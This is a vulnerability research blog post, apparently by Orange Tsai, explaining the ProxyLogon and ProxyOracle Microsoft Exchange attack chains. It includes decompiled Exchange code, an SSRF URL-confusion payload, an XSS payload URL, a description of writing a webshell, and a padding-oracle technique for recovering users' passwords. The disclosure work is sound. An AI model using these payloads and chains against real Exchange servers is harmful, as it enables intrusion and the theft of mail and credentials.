Jun 02, 2021 | - | CVE-2021-33768 | Jul 13, 2021 | - | Orange Tsai and Dlive |
Why did Exchange Server become a hot topic? From my point of view, the whole ProxyLogon attack surface is actually located at an early stage of Exchange request processing. For instance, if the entrance of Exchange is 0, and 100 is the core business logic, ProxyLogon is somewhere around 10. Again, since the vulnerability is located at the beginning place, I believe anyone who has reviewed the security of Exchange carefully would spot the attack surface. This was also why I tweeted my worry about bug collision after reporting to Microsoft. The vulnerability was so impactful, yet it’s a simple one and located at such an early stage.
You all know what happened next: Volexity found that an APT group was leveraging the same SSRF (CVE-2021-26855) to access users’ emails in early January 2021 and reported it to Microsoft. Microsoft then released urgent patches in March. From the public information released afterwards, we found that even though they used the same SSRF, the APT group was exploiting it in a very different way from us. We completed the ProxyLogon attack chain through CVE-2021-27065, while the APT group used EWS and two unknown vulnerabilities in their attack. This convinced us that there was a bug collision on the SSRF vulnerability.
Image from Microsoft Blog
As for the ProxyLogon PoC we reported to MSRC appearing in the wild in late February, we were as curious as everyone else after ruling out a leak from our side through a thorough investigation. With a clearer timeline appearing and more discussion occurring, it seems like this is not the first time that something like this has happened to Microsoft. Maybe you would be interested in learning some interesting stories from here.
A mail server is a highly valuable asset that holds the most confidential secrets and corporate data. In other words, controlling a mail server means controlling the lifeline of a company. As the most commonly used email solution, Exchange Server has been a top target for hackers for a long time. Based on our research, there are more than four hundred thousand Exchange Servers exposed on the Internet. Each server represents a company, and you can imagine how horrible it is when a severe vulnerability appears in Exchange Server.
Normally, I review the existing papers and bugs before starting research. In the whole history of Exchange, are there any interesting cases? Of course. Although most vulnerabilities are based on known attack vectors, such as deserialization or bad input validation, there are still several bugs that are worth mentioning.
The most special one is the arsenal from Equation Group in 2017. It’s the only practical and public pre-auth RCE in the Exchange history. Unfortunately, the arsenal only works on an ancient Exchange Server 2003. If the arsenal leak happened earlier, it could end up with another nuclear-level crisis.
The most interesting one is CVE-2018-8581, disclosed by someone who cooperated with ZDI. Though it was simply an SSRF, it could be combined with NTLM Relay, letting the attacker turn a boring SSRF into something really fancy. For instance, it could directly control the whole Domain Controller through a low-privilege account.
The most surprising one is CVE-2020-0688, which was also disclosed by someone working with ZDI. The root cause of this bug is a hard-coded cryptographic key in Microsoft Exchange. With this hard-coded key, an attacker with low privilege can take over the whole Exchange Server. And as you can see, even in 2020, a silly, hard-coded cryptographic key could still be found in essential software like Exchange. This indicated that Exchange was lacking security reviews, which also inspired me to dig more into Exchange security.
Exchange is a very sophisticated application. Since 2000, Exchange has released a new version every 3 years. Whenever Exchange releases a new version, the architecture changes a lot and becomes different. The changes of architecture and iterations make it difficult to upgrade an Exchange Server. In order to ensure the compatibility between the new architecture and old ones, several design debts were incurred to Exchange Server and led to the new attack surface we found.
Where did we focus in Microsoft Exchange? We focused on the Client Access Service, CAS. CAS is a fundamental component of Exchange. Back in versions 2000/2003, CAS was an independent Frontend Server in charge of all the Frontend web rendering logic. After several rounds of renaming, integration, and version differences, CAS has been downgraded to a service under the Mailbox Role. The official documentation from Microsoft indicates that:
Mailbox servers contain the Client Access services that accept client connections for all protocols. These frontend services are responsible for routing or proxying connections to the corresponding backend services on a Mailbox server
From this description you can see the importance of CAS, and you can imagine how critical it is when bugs are found in such infrastructure. CAS was where we focused, and where the attack surface appeared.
CAS is the fundamental component in charge of accepting all the connections from the client side, no matter if it’s HTTP, POP3, IMAP or SMTP, and proxies the connections to the corresponding Backend Service. As a Web Security researcher, I focused on the Web implementation of CAS.
The CAS web is built on Microsoft IIS. As you can see, there are two websites inside the IIS. The “Default Website” is the Frontend we mentioned before, and the “Exchange Backend” is where the business logic is. After looking into the configuration carefully, we noticed that the Frontend is bound to ports 80 and 443, and the Backend is listening on ports 81 and 444. All the ports are bound to 0.0.0.0, which means anyone could access the Frontend and Backend of Exchange directly. Wouldn’t it be dangerous? Please keep this question in mind and we will answer that later.
Exchange implements the logic of Frontend and Backend via IIS module. There are several modules in Frontend and Backend to complete different tasks, such as the filter, validation, and logging. The Frontend must contain a Proxy Module. The Proxy Module picks up the HTTP request from the client side and adds some internal settings, then forwards the request to the Backend. As for the Backend, all the applications include the Rehydration Module, which is in charge of parsing Frontend requests, populating the client information back, and continuing to process the business logic. Later we will be elaborating how Proxy Module and Rehydration Module work.
Proxy Module chooses a handler based on the current ApplicationPath to process the HTTP request from the client side. For instance, visiting /EWS will use EwsProxyRequestHandler, while /OWA will trigger OwaProxyRequestHandler. All the handlers in Exchange inherit from the class ProxyRequestHandler and implement its core logic, such as how to deal with the HTTP request from the user, which Backend URL to proxy to, and how to synchronize the information with the Backend. The class is also the most central part of the whole Proxy Module. We will separate ProxyRequestHandler into 3 sections: Request, Proxy, and Response.
The Request section will parse the HTTP request from the client and determine which cookies and headers can be proxied to the Backend. Frontend and Backend rely on HTTP Headers to synchronize information and proxy internal status. Therefore, Exchange has defined a blacklist to avoid some internal Headers being misused.
HttpProxy\ProxyRequestHandler.cs
protected virtual bool ShouldCopyHeaderToServerRequest(string headerName) {
return !string.Equals(headerName, "X-CommonAccessToken", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-IsFromCafe", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-SourceCafeServer", OrdinalIgnoreCase)
&& !string.Equals(headerName, "msExchProxyUri", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-MSExchangeActivityCtx", OrdinalIgnoreCase)
&& !string.Equals(headerName, "return-client-request-id", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-Forwarded-For", OrdinalIgnoreCase)
&& (!headerName.StartsWith("X-Backend-Diag-", OrdinalIgnoreCase)
|| this.ClientRequest.GetHttpRequestBase().IsProbeRequest());
}
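To make the blacklist logic easier to follow, here is a minimal Python sketch of the same decision. It is only a re-expression of the listing above, not Exchange code: the function name should_copy_header and the is_probe_request parameter are hypothetical stand-ins, and lowercasing is used as an approximation of OrdinalIgnoreCase for ASCII header names.

```python
# Header names copied from the ShouldCopyHeaderToServerRequest listing above,
# lowercased so the comparison is case-insensitive for ASCII names.
BLOCKED_HEADERS = {
    "x-commonaccesstoken",
    "x-isfromcafe",
    "x-sourcecafeserver",
    "msexchproxyuri",
    "x-msexchangeactivityctx",
    "return-client-request-id",
    "x-forwarded-for",
}
DIAG_PREFIX = "x-backend-diag-"


def should_copy_header(name: str, is_probe_request: bool = False) -> bool:
    """Return True if a client header would be forwarded to the Backend."""
    lowered = name.lower()
    if lowered in BLOCKED_HEADERS:
        return False
    # Diagnostic headers are only forwarded for probe requests.
    if lowered.startswith(DIAG_PREFIX):
        return is_probe_request
    return True
```

Note that any header not named in the list passes through, which is why a Backend-specific header such as msExchLogonMailbox is forwarded by this filter.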
In the last stage of Request, Proxy Module will call the method AddProtocolSpecificHeadersToServerRequest implemented by the handler to add the information to be communicated with the Backend in the HTTP header. This section will also serialize the information from the current login user and put it in a new HTTP header X-CommonAccessToken, which will be forwarded to the Backend later.
For instance, if I log into Outlook Web Access (OWA) with the name Orange, the X-CommonAccessToken that the Frontend proxies to the Backend will be:
The Proxy section first uses the GetTargetBackEndServerUrl method to calculate which Backend URL the HTTP request should be forwarded to. It then initializes a new HTTP Client request with the method CreateServerRequest.
HttpProxy\ProxyRequestHandler.cs
protected HttpWebRequest CreateServerRequest(Uri targetUrl) {
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(targetUrl);
if (!HttpProxySettings.UseDefaultWebProxy.Value) {
httpWebRequest.Proxy = NullWebProxy.Instance;
}
httpWebRequest.ServicePoint.ConnectionLimit = HttpProxySettings.ServicePointConnectionLimit.Value;
httpWebRequest.Method = this.ClientRequest.HttpMethod;
httpWebRequest.Headers["X-FE-ClientIP"] = ClientEndpointResolver.GetClientIP(SharedHttpContextWrapper.GetWrapper(this.HttpContext));
httpWebRequest.Headers["X-Forwarded-For"] = ClientEndpointResolver.GetClientProxyChainIPs(SharedHttpContextWrapper.GetWrapper(this.HttpContext));
httpWebRequest.Headers["X-Forwarded-Port"] = ClientEndpointResolver.GetClientPort(SharedHttpContextWrapper.GetWrapper(this.HttpContext));
httpWebRequest.Headers["X-MS-EdgeIP"] = Utilities.GetEdgeServerIpAsProxyHeader(SharedHttpContextWrapper.GetWrapper(this.HttpContext).Request);
// ...
return httpWebRequest;
}
Exchange will also generate a Kerberos ticket via the HTTP Service-Class of the Backend and put it in the Authorization header. This header is designed to prevent anonymous users from accessing the Backend directly. With the Kerberos Ticket, the Backend could validate the access from the Frontend.
HttpProxy\ProxyRequestHandler.cs
if (this.ProxyKerberosAuthentication) {
serverRequest.ConnectionGroupName = this.ClientRequest.UserHostAddress + ":" + GccUtils.GetClientPort(SharedHttpContextWrapper.GetWrapper(this.HttpContext));
} else if (this.AuthBehavior.AuthState == AuthState.BackEndFullAuth || this.
ShouldBackendRequestBeAnonymous() || (HttpProxySettings.TestBackEndSupportEnabled.Value
&& !string.IsNullOrEmpty(this.ClientRequest.Headers["TestBackEndUrl"]))) {
serverRequest.ConnectionGroupName = "Unauthenticated";
} else {
serverRequest.Headers["Authorization"] = KerberosUtilities.GenerateKerberosAuthHeader(
serverRequest.Address.Host, this.TraceContext,
ref this.authenticationContext, ref this.kerberosChallenge);
}
HttpProxy\KerberosUtilities.cs
internal static string GenerateKerberosAuthHeader(string host, int traceContext, ref AuthenticationContext authenticationContext, ref string kerberosChallenge) {
byte[] array = null;
byte[] bytes = null;
// ...
authenticationContext = new AuthenticationContext();
string text = "HTTP/" + host;
authenticationContext.InitializeForOutboundNegotiate(AuthenticationMechanism.Kerberos, text, null, null);
SecurityStatus securityStatus = authenticationContext.NegotiateSecurityContext(inputBuffer, out bytes);
// ...
string @string = Encoding.ASCII.GetString(bytes);
return "Negotiate " + @string;
}
Therefore, a Client request proxied to the Backend will have several HTTP Headers added for internal use. The two most essential Headers are X-CommonAccessToken, which indicates the mail user’s login identity, and the Kerberos Ticket, which represents legitimate access from the Frontend.
The last section is Response. It receives the response from the Backend and decides which headers or cookies are allowed to be sent back to the Frontend.
Now let’s move on and check how the Backend processes the request from the Frontend. The Backend first uses the method IsAuthenticated to check whether the incoming request is authenticated. Then the Backend will verify whether the request is equipped with an extended right called ms-Exch-EPI-Token-Serialization. With the default setting, only the Exchange Machine Account has such authorization. This is also why the Kerberos Ticket generated by the Frontend can pass the checkpoint but you can’t access the Backend directly with a low-privilege account.
After passing the check, Exchange will restore the login identity used in the Frontend by deserializing the header X-CommonAccessToken back to the original Access Token, and then put it in the httpContext object to progress to the business logic in the Backend.
Authentication\BackendRehydrationModule.cs
private void OnAuthenticateRequest(object source, EventArgs args) {
if (httpContext.Request.IsAuthenticated) {
this.ProcessRequest(httpContext);
}
}
private void ProcessRequest(HttpContext httpContext) {
CommonAccessToken token;
if (this.TryGetCommonAccessToken(httpContext, out token)) {
// ...
}
}
private bool TryGetCommonAccessToken(HttpContext httpContext, out CommonAccessToken token) {
string text = httpContext.Request.Headers["X-CommonAccessToken"];
if (string.IsNullOrEmpty(text)) {
return false;
}
bool flag;
try {
flag = this.IsTokenSerializationAllowed(httpContext.User.Identity as WindowsIdentity);
} finally {
httpContext.Items["BEValidateCATRightsLatency"] = stopwatch.ElapsedMilliseconds - elapsedMilliseconds;
}
token = CommonAccessToken.Deserialize(text);
httpContext.Items["Item-CommonAccessToken"] = token;
//...
}
private bool IsTokenSerializationAllowed(WindowsIdentity windowsIdentity) {
flag2 = LocalServer.AllowsTokenSerializationBy(clientSecurityContext);
return flag2;
}
private static bool AllowsTokenSerializationBy(ClientSecurityContext clientContext) {
return LocalServer.HasExtendedRightOnServer(clientContext,
WellKnownGuid.TokenSerializationRightGuid); // ms-Exch-EPI-Token-Serialization
}
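The order of checks in the Backend can be summarized with a small Python model. This is a sketch under stated assumptions, not the Exchange implementation: the function rehydrate and its parameters are hypothetical, and a Base64-encoded JSON object stands in for the real CommonAccessToken serialization format, which the listing does not show.

```python
import base64
import json
from typing import Optional


def rehydrate(is_authenticated: bool,
              caller_has_token_serialization_right: bool,
              headers: dict) -> Optional[dict]:
    """Model of the Backend flow: authenticate, check the right, deserialize."""
    # Step 1: unauthenticated requests are never processed.
    if not is_authenticated:
        return None
    # Step 2: without the header there is nothing to restore.
    text = headers.get("X-CommonAccessToken")
    if not text:
        return None
    # Step 3: only callers holding the extended right
    # (ms-Exch-EPI-Token-Serialization) may supply an identity.
    if not caller_has_token_serialization_right:
        return None
    # Step 4: restore the identity (stand-in format: Base64-encoded JSON).
    return json.loads(base64.b64decode(text))
```

The point of the model is that the restored identity comes entirely from the header, so the two earlier checks are the only things standing between a caller and an arbitrary identity.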
After a brief introduction to the architecture of CAS, we now realize that CAS is just a well-written HTTP Proxy (or Client), and we know that implementing Proxy isn’t easy. So I was wondering:
Could I use a single HTTP request to access different contexts in Frontend and Backend respectively to cause some confusion?
If we could do that, maaaaaybe I could bypass some Frontend restrictions to access arbitrary Backends and abuse some internal API. Or, we can confuse the context to leverage the inconsistency of the definition of dangerous HTTP headers between the Frontend and Backend to do further interesting attacks.
With these thoughts in mind, let’s start hunting!
The first exploit is the ProxyLogon. As introduced before, this may be the most severe vulnerability in the Exchange history ever. ProxyLogon is chained with 2 bugs:
There are more than 20 handlers corresponding to different application paths in the Frontend. While reviewing the implementations, we found that the method GetTargetBackEndServerUrl, which is responsible for calculating the Backend URL in the static resource handler, assigns the Backend target directly from cookies.
Now you can see how simple this vulnerability is once you know the architecture!
HttpProxy\ProxyRequestHandler.cs
protected virtual Uri GetTargetBackEndServerUrl() {
this.LogElapsedTime("E_TargetBEUrl");
Uri result;
try {
UrlAnchorMailbox urlAnchorMailbox = this.AnchoredRoutingTarget.AnchorMailbox as UrlAnchorMailbox;
if (urlAnchorMailbox != null) {
result = urlAnchorMailbox.Url;
} else {
UriBuilder clientUrlForProxy = this.GetClientUrlForProxy();
clientUrlForProxy.Scheme = Uri.UriSchemeHttps;
clientUrlForProxy.Host = this.AnchoredRoutingTarget.BackEndServer.Fqdn;
clientUrlForProxy.Port = 444;
if (this.AnchoredRoutingTarget.BackEndServer.Version < Server.E15MinVersion) {
this.ProxyToDownLevel = true;
RequestDetailsLoggerBase<RequestDetailsLogger>.SafeAppendGenericInfo(this.Logger, "ProxyToDownLevel", true);
clientUrlForProxy.Port = 443;
}
result = clientUrlForProxy.Uri;
}
}
finally {
this.LogElapsedTime("L_TargetBEUrl");
}
return result;
}
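Stripped of logging, the non-anchor branch of this method reduces to a host, a port choice, and the client path. The following Python sketch shows that reduction; the BackEndServer dataclass, the integer version, and E15_MIN_VERSION are hypothetical simplifications of the types in the listing.

```python
from dataclasses import dataclass

E15_MIN_VERSION = 15  # hypothetical stand-in for Server.E15MinVersion


@dataclass
class BackEndServer:
    fqdn: str
    version: int


def target_backend_url(server: BackEndServer, client_path: str) -> str:
    """Build the Backend URL: port 444 by default, 443 for down-level servers."""
    port = 443 if server.version < E15_MIN_VERSION else 444
    # The FQDN is placed into the URL as-is; nothing here validates it.
    return f"https://{server.fqdn}:{port}{client_path}"
```

For example, target_backend_url(BackEndServer("mbx01.corp.local", 15), "/owa/auth/x.js") yields a URL on port 444, while a version below the threshold yields port 443.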
From the code snippet, you can see the property BackEndServer.Fqdn of AnchoredRoutingTarget is assigned from the cookie directly.
HttpProxy\OwaResourceProxyRequestHandler.cs
protected override AnchorMailbox ResolveAnchorMailbox() {
HttpCookie httpCookie = base.ClientRequest.Cookies["X-AnonResource-Backend"];
if (httpCookie != null) {
this.savedBackendServer = httpCookie.Value;
}
if (!string.IsNullOrEmpty(this.savedBackendServer)) {
base.Logger.Set(3, "X-AnonResource-Backend-Cookie");
if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
ExTraceGlobals.VerboseTracer.TraceDebug<HttpCookie, int>((long)this.GetHashCode(), "[OwaResourceProxyRequestHandler::ResolveAnchorMailbox]: AnonResourceBackend cookie used: {0}; context {1}.", httpCookie, base.TraceContext);
}
return new ServerInfoAnchorMailbox(BackEndServer.FromString(this.savedBackendServer), this);
}
return new AnonymousAnchorMailbox(this);
}
We can only control the Host part of the URL, but hang on, isn’t manipulating a URL Parser exactly what I am good at? Exchange builds the Backend URL with the built-in UriBuilder. However, since C# didn’t verify the Host, we can enclose the whole URL with some special characters to access arbitrary servers and ports.
https://[foo]@example.com:443/path#]:444/owa/auth/x.js
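To see why the example URL above ends up pointing somewhere else, the following Python sketch builds it by plain concatenation and then splits it the way a generic URL reader would (fragment first, then authority, then userinfo). Both helpers are hypothetical and deliberately simplified (no query handling); this is not the .NET UriBuilder or Uri parser, only an illustration of the reading order.

```python
def build_url(host: str, path: str, port: int = 444) -> str:
    """Concatenate scheme, host, port and path without validating the host."""
    return f"https://{host}:{port}{path}"


def generic_split(url: str) -> dict:
    """Split a URL: fragment after '#', authority before the first '/',
    userinfo before the last '@'. Simplified for illustration."""
    rest = url.split("://", 1)[1]
    before_fragment, _, fragment = rest.partition("#")
    authority, slash, path = before_fragment.partition("/")
    userinfo, _, hostport = authority.rpartition("@")
    host, _, port = hostport.partition(":")
    return {"userinfo": userinfo, "host": host, "port": port,
            "path": slash + path, "fragment": fragment}


# The host string is derived from the example URL shown above.
url = build_url("[foo]@example.com:443/path#]", "/owa/auth/x.js")
parts = generic_split(url)
```

Here parts["host"] is example.com and parts["port"] is 443, while the ":444/owa/auth/x.js" suffix that the Frontend appended lands in the fragment and is never sent.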
So far we have a super SSRF that can control almost all the HTTP requests and get all the replies. The most impressive thing is that the Frontend of Exchange will generate a Kerberos Ticket for us, which means even when we are attacking a protected and domain-joined HTTP service, we can still hack with the authentication of Exchange Machine Account.
So, what is the root cause of this arbitrary Backend assignment? As mentioned, the Exchange Server changes its architecture while releasing new versions. The same component under the same name might have different functions in different versions. Microsoft has put great effort into ensuring architectural compatibility between new and old versions. This cookie is a quick solution, a piece of Exchange design debt that lets the Frontend in the new architecture identify where the old Backend is.
Thanks to the super SSRF, we can access the Backend without restriction. The next step is to find an RCE bug to chain with it. Here we leverage a Backend internal API /proxyLogon.ecp to become the admin. The API is also the reason why we called it ProxyLogon.
Because we leverage the Frontend handler of static resources to access the Exchange Control Panel (ECP) Backend, the header msExchLogonMailbox, which is a special HTTP header in the ECP Backend, will not be blocked by the Frontend. By leveraging this minor inconsistency, we can specify ourselves as the SYSTEM user and generate a valid ECP session with the internal API.
With the inconsistency between the Frontend and Backend, we can access all the functions on ECP by Header forgery and internal Backend API abuse. Next, we have to find an RCE bug on the ECP interface to chain them together. The ECP wraps the Exchange PowerShell commands as an abstract interface through /ecp/DDI/DDIService.svc. The DDIService defines several PowerShell executing pipelines in XAML so that they can be accessed from the Web. While verifying the DDI implementation, we found that the WriteFileActivity tag did not check the file path properly, which led to an arbitrary file write.
DDIService\WriteFileActivity.cs
public override RunResult Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, Workflow.UpdateTableDelegate updateTableDelegate) {
DataRow dataRow = dataTable.Rows[0];
string value = (string)input[this.InputVariable];
string path = (string)input[this.OutputFileNameVariable];
RunResult runResult = new RunResult();
try {
runResult.ErrorOccur = true;
using (StreamWriter streamWriter = new StreamWriter(File.Open(path, FileMode.CreateNew)))
{
streamWriter.WriteLine(value);
}
runResult.ErrorOccur = false;
}
// ...
}
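The listing opens whatever path it is handed. For contrast, here is a minimal Python sketch of the kind of containment check that is missing. It is purely illustrative and is not Microsoft's fix: the function is_inside and the idea of a single allowed base directory are assumptions made for the example.

```python
import os


def is_inside(base_dir: str, candidate: str) -> bool:
    """Return True only if candidate resolves to a location under base_dir."""
    base = os.path.realpath(base_dir)
    # Joining with an absolute candidate discards base, which the
    # comparison below then rejects.
    target = os.path.realpath(os.path.join(base, candidate))
    try:
        return os.path.commonpath([base, target]) == base
    except ValueError:
        # Raised when the two paths cannot be compared (e.g. different drives).
        return False
```

With a base of /srv/export, a plain file name is accepted, while a relative path containing ".." or an absolute path elsewhere on disk is rejected.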
There are several paths to trigger the arbitrary file write vulnerability. Here we use ResetOABVirtualDirectory.xaml as an example and write the result of Set-OABVirtualDirectory to the webroot to be our Webshell.
Now we have a working pre-auth RCE exploit chain. An unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server through an exposed port 443. Here is a demonstration video:
As the first blog of this series, ProxyLogon perfectly shows how severe this attack surface could be. We will have more examples to come. Stay tuned!
Hi, this is part 2 of the New MS Exchange Attack Surface. Because this article refers to several architecture introductions and attack surface concepts from the previous article, you can find the first piece here:
This time, we will be introducing ProxyOracle. Compared with ProxyLogon, ProxyOracle is an interesting exploit with a different approach. By simply leading a user to visit a malicious link, ProxyOracle allows an attacker to recover the user’s password in plaintext completely. ProxyOracle consists of two vulnerabilities:
So where is ProxyOracle? Based on the CAS architecture we introduced before, the Frontend of CAS will first serialize the User Identity to a string and put it in the X-CommonAccessToken header. The header will be merged into the client’s HTTP request and sent to the Backend later. Once the Backend receives it, it deserializes the header back to the original User Identity from the Frontend.
We now know how the Frontend and Backend synchronize the User Identity. The next step is to explain how the Frontend knows who you are and processes your credentials. The Outlook Web Access (OWA) uses a fancy interface to handle the whole login mechanism, which is called Form-Based Authentication (FBA). The FBA is a special IIS module that inherits from ProxyModule and is responsible for executing the transformation between the credentials and cookies before entering the proxy logic.
HTTP is a stateless protocol. To keep your login state, FBA saves the username and password in cookies. Every time you visit the OWA, Exchange will parse the cookies, retrieve the credential and try to log in with that. If the login succeeds, Exchange will serialize your User Identity into a string, put it into the X-CommonAccessToken header, and forward it to the Backend.
HttpProxy\FbaModule.cs
protected override void OnBeginRequestInternal(HttpApplication httpApplication) {
httpApplication.Context.Items["AuthType"] = "FBA";
if (!this.HandleFbaAuthFormPost(httpApplication)) {
try {
this.ParseCadataCookies(httpApplication);
} catch (MissingSslCertificateException) {
NameValueCollection nameValueCollection = new NameValueCollection();
nameValueCollection.Add("CafeError", ErrorFE.FEErrorCodes.SSLCertificateProblem.ToString());
throw new HttpException(302, AspNetHelper.GetCafeErrorPageRedirectUrl(httpApplication.Context, nameValueCollection));
}
}
base.OnBeginRequestInternal(httpApplication);
}
All the cookies are encrypted so that even if an attacker can hijack the HTTP request, he/she still can’t get your credentials in plaintext. FBA leverages 5 special cookies to accomplish the whole de/encryption process:
- cadata - The encrypted username and password
- cadataTTL - The Time-To-Live timestamp
- cadataKey - The KEY for encryption
- cadataIV - The IV for encryption
- cadataSig - The signature to prevent tampering
The encryption logic will first generate two 16-byte random strings as the IV and KEY for the current session. The username and password will then be encoded with Base64, encrypted with AES, and sent back to the client within cookies. Meanwhile, the IV and KEY will be sent to the user, too. To prevent the client from decrypting the credential directly with the known IV and KEY, Exchange will once again use RSA to encrypt the IV and KEY via its SSL certificate private key before sending them out!
Here is a Pseudo Code for the encryption logic:
@key = GetServerSSLCert().GetPrivateKey()
cadataSig = RSA(@key).Encrypt("Fba Rocks!")
cadataIV = RSA(@key).Encrypt(GetRandomBytes(16))
cadataKey = RSA(@key).Encrypt(GetRandomBytes(16))
@timestamp = GetCurrentTimestamp()
cadataTTL = AES_CBC(cadataKey, cadataIV).Encrypt(@timestamp)
@blob = "Basic " + ToBase64String(UserName + ":" + Password)
cadata = AES_CBC(cadataKey, cadataIV).Encrypt(@blob)
Exchange uses CBC as its block cipher mode. If you are familiar with Cryptography, you might be wondering whether the CBC mode here is vulnerable to the Padding Oracle Attack. Bingo! As a matter of fact, the Padding Oracle Attack still exists in software as essential as Exchange in 2021!
When there is something wrong with the FBA, Exchange attaches an error code and redirects the HTTP request back to the original login page. So where is the Oracle? In the cookie decryption, Exchange uses an exception to catch the Padding Error, and because of the exception, the program returns immediately, so the error code number is 0, which means None:
Location: /OWA/logon.aspx?url=…&reason=0
In contrast with the Padding Error, if the decryption is good, Exchange will continue the authentication process and try to log in with the corrupted username and password. At this point, the result must be a failure, and the error code number is 2, which represents InvalidCredntials:
Location: /OWA/logon.aspx?url=…&reason=2
The diagram looks like:
With the difference, we now have an Oracle to identify whether the decryption process is successful or not.
HttpProxy\FbaModule.cs
private void ParseCadataCookies(HttpApplication httpApplication)
{
HttpContext context = httpApplication.Context;
HttpRequest request = context.Request;
HttpResponse response = context.Response;
string text = request.Cookies["cadata"].Value;
string text2 = request.Cookies["cadataKey"].Value;
string text3 = request.Cookies["cadataIV"].Value;
string text4 = request.Cookies["cadataSig"].Value;
string text5 = request.Cookies["cadataTTL"].Value;
// ...
RSACryptoServiceProvider rsacryptoServiceProvider = (x509Certificate.PrivateKey as RSACryptoServiceProvider);
byte[] array = null;
byte[] array2 = null;
byte[] rgb2 = Convert.FromBase64String(text2);
byte[] rgb3 = Convert.FromBase64String(text3);
array = rsacryptoServiceProvider.Decrypt(rgb2, true);
array2 = rsacryptoServiceProvider.Decrypt(rgb3, true);
// ...
using (AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider()) {
aesCryptoServiceProvider.Key = array;
aesCryptoServiceProvider.IV = array2;
using (ICryptoTransform cryptoTransform2 = aesCryptoServiceProvider.CreateDecryptor()) {
byte[] bytes2 = null;
try {
byte[] array5 = Convert.FromBase64String(text);
bytes2 = cryptoTransform2.TransformFinalBlock(array5, 0, array5.Length);
} catch (CryptographicException ex8) {
if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
ExTraceGlobals.VerboseTracer.TraceDebug<CryptographicException>((long)this.GetHashCode(), "[FbaModule::ParseCadataCookies] Received CryptographicException {0} transforming auth", ex8);
}
httpApplication.Response.AppendToLog("&CryptoError=PossibleSSLCertrolloverMismatch");
return;
} catch (FormatException ex9) {
if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
ExTraceGlobals.VerboseTracer.TraceDebug<FormatException>((long)this.GetHashCode(), "[FbaModule::ParseCadataCookies] Received FormatException {0} decoding caData auth", ex9);
}
httpApplication.Response.AppendToLog("&DecodeError=InvalidCaDataAuthCookie");
return;
}
string @string = Encoding.Unicode.GetString(bytes2);
request.Headers["Authorization"] = @string;
}
}
}
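The two outcomes described above can be modeled in a few lines of Python. This is a sketch of the server-side branching only, assuming PKCS#7 padding (the listing does not set a padding mode explicitly, so this is an assumption); pkcs7_unpad, logon_reason, and the check_login callback are hypothetical names, and the input is the raw block-cipher output before padding removal.

```python
from typing import Callable, Optional

BLOCK_SIZE = 16
REASON_NONE = 0                 # early return after a padding error
REASON_INVALID_CREDENTIALS = 2  # padding fine, login rejected


def pkcs7_unpad(data: bytes) -> bytes:
    """Strip PKCS#7 padding, raising ValueError if it is malformed."""
    if not data or len(data) % BLOCK_SIZE:
        raise ValueError("length is not a multiple of the block size")
    pad = data[-1]
    if not 1 <= pad <= BLOCK_SIZE or data[-pad:] != bytes([pad]) * pad:
        raise ValueError("invalid padding")
    return data[:-pad]


def logon_reason(raw_plaintext: bytes,
                 check_login: Callable[[bytes], bool]) -> Optional[int]:
    """Return the redirect reason code, or None when the login succeeds."""
    try:
        credentials = pkcs7_unpad(raw_plaintext)
    except ValueError:
        return REASON_NONE
    if not check_login(credentials):
        return REASON_INVALID_CREDENTIALS
    return None
```

Because the two failure paths return different codes, the response alone reveals whether the padding of a submitted value was well formed.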
It should be noted that since the IV is encrypted with the SSL certificate private key, we can’t recover the first block of the plaintext through XOR. But that doesn’t cause any problem for us, because C# internally processes strings as UTF-16, so the first 12 bytes of the plaintext must be B\x00a\x00s\x00i\x00c\x00 \x00. With one more Base64 encoding applied, we will only lose the first 1.5 bytes in the username field.
(16−6×2) ÷ 2 × (3/4) = 1.5
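The arithmetic can be checked with a short Python sketch that builds a blob in the same layout as the pseudo code and measures the first 16-byte block. The helper names are hypothetical, and encoding the username and password as UTF-8 before Base64 is an assumption; the UTF-16 encoding of the final string follows from the Encoding.Unicode call in the listing.

```python
import base64

BLOCK_SIZE = 16


def build_blob(username: str, password: str) -> bytes:
    """'Basic ' + Base64(user:pass), encoded as UTF-16LE like a C# string."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return ("Basic " + token).encode("utf-16-le")


def first_block_summary(blob: bytes) -> tuple:
    """Return (known prefix bytes, unknown Base64 chars, unknown raw bytes)."""
    known = "Basic ".encode("utf-16-le")              # 6 chars x 2 bytes = 12
    if not blob.startswith(known):
        raise ValueError("blob does not start with the expected prefix")
    unknown_bytes = BLOCK_SIZE - len(known)           # 16 - 12 = 4
    unknown_b64_chars = unknown_bytes // 2            # 2 UTF-16 characters
    unknown_raw_bytes = unknown_b64_chars * 3 / 4     # Base64: 4 chars -> 3 bytes
    return len(known), unknown_b64_chars, unknown_raw_bytes
```

For any credentials, first_block_summary(build_blob(...)) gives 12 known bytes, 2 unknown Base64 characters, and 1.5 unknown bytes of the username, matching the formula above.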
As of now, we have a Padding Oracle that allows us to decrypt any user’s cookie. BUT, how can we get the client cookies? Here we find another vulnerability to chain them together.
We discovered an XSS (CVE-2021-31195) in the CAS Frontend (Yeah, CAS again) to chain with it. The root cause of this XSS is relatively simple: Exchange forgets to sanitize the data before printing it out, so we can use the \ to escape from the JSON format and inject arbitrary JavaScript code.
https://exchange/owa/auth/frowny.aspx
?app=people
&et=ServerError
&esrc=MasterPage
&te=\
&refurl=}}};alert(document.domain)//
But here comes another question: all the sensitive cookies are protected by the HttpOnly flag, which makes us unable to access the cookies by JavaScript. WHAT SHOULD WE DO?
As we could execute arbitrary JavaScript on browsers, why don’t we just insert the SSRF cookie we used in ProxyLogon? Once we add this cookie and assign the Backend target value as our malicious server, Exchange will become a proxy between the victims and us. We can then take over all the client’s HTTP static resources and get the protected HttpOnly cookies!
By chaining bugs together, we have an elegant exploit that can steal any user’s cookies by just sending him/her a malicious link. What’s noteworthy is that the XSS here is only helping us to steal the cookie, which means all the decryption processes wouldn’t require any authentication and user interaction. Even if the user closes the browser, it wouldn’t affect our Padding Oracle Attack!
Here is the demonstration video showing how we recover the victim’s password:
